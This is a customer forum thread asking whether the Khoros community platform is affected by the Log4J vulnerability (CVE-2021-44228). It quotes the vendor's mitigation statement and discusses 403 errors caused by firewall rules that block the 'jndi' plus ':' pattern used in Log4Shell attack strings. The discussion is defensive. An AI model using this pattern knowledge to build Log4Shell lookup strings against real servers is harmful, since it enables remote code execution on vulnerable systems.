Is community impacted by Log4J vulnerability?
Is Khoros community compaged by this log4j vulnerability: CVE-2021-44228
Forum Discussion
Got this response from our TAM today when asking for info:
"We completed a thorough investigation of our global infrastructure since we were made aware of the flaw on December 10 and found zero indication of any successful exploitation of this vulnerability in our environment. Further, we have identified and mitigated all of the known risks resulting from the vulnerability in our environment. As of 2021-12-11 2:45pm CT, all Khoros product infrastructure is considered mitigated against the known risk of this vulnerability.
We continue to remain vigilant while assessing our overall security posture and will further review our systems and services for potential risk and take appropriate actions should any new information about the vulnerability be discovered. "Thanks for sharing this here. I was preparing to ask the same questions.
It would be nice to have an official statement from Khoros posted somewhere though.
Contact support. They have a canned message with this info.
The engineering teams worked very hard before the holidays to get everything locked down, updated, and fixed, and are continuing to be on top of this and other security issues. Site and data security is our top priority.
HelgaMarieAuran's answer from her TAM is correct:"We completed a thorough investigation of our global infrastructure since we were made aware of the flaw on December 10 and found zero indication of any successful exploitation of this vulnerability in our environment. Further, we have identified and mitigated all of the known risks resulting from the vulnerability in our environment. As of 2021-12-11 2:45pm CT, all Khoros product infrastructure is considered mitigated against the known risk of this vulnerability.
We continue to remain vigilant while assessing our overall security posture and will further review our systems and services for potential risk and take appropriate actions should any new information about the vulnerability be discovered. "Yes, we need to know this too.
I am attempting to publish our company's response on the community but get a 403 error on it. Anyone else encountering an issue publishing a statement on the Khoros platform? It is only this post and I even stripped it down to basic formatting and can't get it to publish. It appears to be some type of block on content related to the topic?
allisonable wrote:It appears to be some type of block on content related to the topic?
It seems (after some trial and error) the phrase "jndi" plus ":" is being blocked by Khoros in all input forms generating a 403 forbidden error.
Try removing that phrase from the topic (if it's in there at all)?
allisonable & Notmark-VFZ
I think the issue you're seeing is related to Web Application Firewall (WAF) changes that may have been made on your site. We hit this with the word 'localhost'. No matter what we did, that word caused a 403 error.
After checking in with Support they asked me to review the WAF email and sure enough that was the culprit.
Check your inbox for "Khoros Web Application Firewall (WAF) rollout". If you dont have the email, I'd contact support, ask if this is WAF related based on this"While the rules and filters have been vetted and tested prior to being rolled out, due to the nature and customizability of the Community platform, there is a small risk that there could be some level of unexpected impact. Issues caused by the WAF will result in end-users receiving a 403 forbidden response to an operation. Please contact Support if you see this behavior and provide as much detail as possible about the action you were taking and the timing of that action (including time zone information)."
Thanks HelgaMarieAuran for sharing that update, had our own Security team asking today (Also would be nice if Khoros proactively was sending this out...)
Reviewing the latest from the ISC, it would appear some initial mitigations for Log4J may not be enough and further mitigations may be required.
https://isc.sans.edu/forums/diary/Log4j+2150+and+previously+suggested+mitigations+may+not+be+enough/28134/has more details.
Can we confirm that Khoros infrastructure has adopted this revised guidance?
As mentioned on various websites, early adopter who deploys Version 2.15 aren´t fully safe, so the question is, did Khoros uses version 2.16 meanwhile?
Thank you 🤞
tyw wrote:I think the issue you're seeing is related to Web Application Firewall (WAF) changes that may have been made on your site. We hit this with the word 'localhost'. No matter what we did, that word caused a 403 error.
After checking in with Support they asked me to review the WAF email and sure enough that was the culprit.The 403 forbidden error is definitely because of the WAF, and rightly so!
It's basically the 1st line of defense in preventing any kind of attack using the Log4Shell vulnerability. The WAF blocks "jndi" followed by ":" because that is a must in the string used to start the attack.
So even if you have a vulnerable server, the server will not receive any malicious strings because you're blocking it before it even gets sent to the server.
